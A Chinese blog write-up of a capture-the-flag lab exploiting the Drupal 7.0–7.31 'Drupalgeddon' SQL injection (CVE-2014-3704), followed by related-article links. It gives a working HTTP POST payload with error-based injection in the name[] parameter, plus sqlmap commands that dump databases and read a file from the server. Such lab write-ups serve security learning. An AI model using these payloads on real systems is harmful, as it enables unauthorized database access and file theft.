[春秋云镜]CVE-2014-3704

已于 2022-12-03 21:21:22 修改
阅读量814 收藏 2
点赞数 1
分类专栏: 春秋云镜 靶场 文章标签: 安全
于 2022-11-30 19:15:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128120454
版权

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。

春秋云镜开启靶场:

http://eci-2zeew3c5wwagv03pa0nz.cloudeci1.ichunqiu.com/

POC

POST /?q=node&destination=node HTTP/1.1
Host: eci-2zeew3c5wwagv03pa0nz.cloudeci1.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 135

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,(select database())),0)%23]=bob&name[0]=a

成功获取数据库

可以直接放到SQLMAP跑

POST /?q=node&destination=node HTTP/1.1
Host: eci-2zeew3c5wwagv03pa0nz.cloudeci1.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,*),0)%23]=bob&name[0]=a

└─# sqlmap -r /root/桌面/SQL.txt  --dbs --batch                                                         

 获取flag

 └─# sqlmap -r /root/桌面/SQL.txt  --file-read "/flag" --batch

 

春天11-
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704
qq_51577576的博客
02-16 1358
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704) Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
cve-2014-4323:cve-2014-4323 poc
05-02
CVE-2014-4323 PoC
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" 是IIS提供的一个特性,提供了黑白名单,来限制用户对web资源的访问。由于没有合适的对比"IP and domain restriction" filtering list 与客户外部请求,导致攻击者可以构造特定的请求突破访问限制。 Microsoft --------- Microsoft已经为此发布了一个安全公告(MS14-076)以及相应补丁: MS14-076:Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) 链接:https://technet.microsoft.com/zh-cn/library/security/MS14-076.aspx
CVE-2014-4113-exp.zip_CVE-2014-4113_cve_cve-2014-4113提权
09-24
CVE-2014-4113提权漏洞利用代码,国外大牛将最初只能在win7上使用的代码扩展到了win8上可用。python开发~
CVE-2014-4936:CVE-2014-4936 POC 代码的存储库
07-07
CVE-2014-4936:Malwarebytes Anti-Malware 和 Anti-Exploit 升级劫持 ============== 此存储库包含 CVE-2014-4936 的 POC。 关于该漏洞如何工作以及如何使用 POC 利用它的完整文章已在此处发布:( ) 时间线: Malwarebytes 反恶意软件 漏洞发现时间: June 18th 2014 漏洞报告时间: July 16th 2014 October 3rd 2014年October 3rd 2014发布的2.0.3版本中修复的漏洞 Malwarebytes 反漏洞利用 漏洞发现时间: August 19th 2014 漏洞报告时间: August 21st 2014 September 5th 2014年September 5th 2014发布的1.04.1.1012版本漏洞修复 漏洞 A
解决OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)安全漏洞,升级OpenSSL到OpenSSL 1.0.1g
10-25
近期服务器开放的https的访问,确被安全组扫描出安全漏洞(OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)),为修复该漏洞,升级OpenSSL到OpenSSL 1.0.1g,同时重新编译升级OpenSSH和nginx,在此提供升级脚本及升级所用安装包供大家参考
CVE-2014-3704 Drupal SQL注入漏洞
星落的博客
04-07 3569
目录 漏洞介绍 影响版本 环境搭建 漏洞复现 漏洞介绍 Drupal 是一款用量庞大的CMS,其中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码 影响版本 7.0-7.31 环境搭建 1.切换到drupal相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2014-3704 docker-compose build docker-compose up -d 2...
春秋云镜CVE-2014-3704
2301_78321656的博客
07-15 1761
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。访问漏洞环境,寻找可以利用的点,发现有登录框并根据漏洞简介,猜测可能在此有SQL注入漏洞。构造注入payload放包,看到有报错回显,存在sql注入。
春秋云镜 CVE-2014-3704
qq_22002773的博客
09-17 328
春秋云镜 CVE-2014-3704
Vulhub之“Drupalgeddon” SQL注入漏洞(CVE-2014-3704
angry_program的博客
03-04 3486
简介 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 漏洞环境 进入对应的路径: vulhub-master/drupal/CVE-2014-3704 执行如下命令启动Drupal 7.31环境: docker-compose up -d 环境...
vulnhub DC-1靶机实战
m0_51195235的博客
08-01 662
利用多种工具对DC-1靶机进行渗透测试,从而获取flag
【漏洞复现】Drupal_小于7.32版本 _“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
最新发布
过期的秋刀鱼
11-04 350
存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。即可看到Drupal的安装页面,使用默认配置安装即可。Drupal 是一款用量庞大的CMS,其。Drupal 7.0~7.31版本。其中,Mysql数据库名填写。,数据库用户名、密码为。7.0~7.31版本。
vulnhub靶场 DC-1
weixin_52221158的博客
08-27 251
链接:https://pan.baidu.com/s/1W3bEDx219EEsnGFUnDX3-Q。查找和drupal有关的,尽量选择新日期较优秀的,使用序号1的,反弹shell。可以看到目前只需要设置rhosts即可,即靶场ip,然后进行exploit。使用msf看是否有利用的攻击脚本,输入msfconsole启动。下载完为一个py文件,在下载文件的目录下,下面为一些参数提示。注意目前能用来提权的可行性文件,我们使用find提权。suid 提权,就是设置的一些可以root运行的。先查看kali的ip。.
[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现
weixin_30940783的博客
06-11 1372
记录下自己的复现思路 漏洞影响: Drupal 7.31 Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。 0x01漏洞复现 复现环境: 1)Apache2.4 2)Php 7.0 3)drupal 7.31https://www.drupal.org/drupal-7.31-release-notes(点击下载) 环境打包在目录下安装即可 ...
Drupalgeddon” SQL注入漏洞(CVE-2014-3704
2301_76467680的博客
06-28 138
拉取环境访问页面后配置界面配置完成后显示下图然后登录界面抓包修改数据包POST /?q=node&destination=node HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: c
php cve-2014-8142漏洞,Drupal 7.31 SQL注入漏洞(CVE-2014-3704) EXP测试代码
weixin_39594312的博客
04-01 662
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。最近频繁爆发各种0day,真是把大家累坏了。Drupal 7.31 SQL注入漏洞(CVE-2014-3704)就是其中一个,该漏洞利用测试方法“简单粗暴”,受到安全研究者们的青睐。Drupal Sql注入漏洞原理是酱紫的,Drupal在处理IN语句的时候,要通过expandArgu...
[Vulnhub]Drupal7.3漏洞复现
qq_69209270的博客
10-07 250
cve-2014-3704主要判断是否有sql漏洞,后面操作全是靠kali中工具网站要学会利用kali中的工具,kali中工具很多,尤其是searchsploit工具,大部分cms漏洞都可以在上面找到。
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1247
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
[春秋云镜]CVE-2020-26042
niubi707的博客
12-08 728
春秋云镜CVE-2020-26042Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值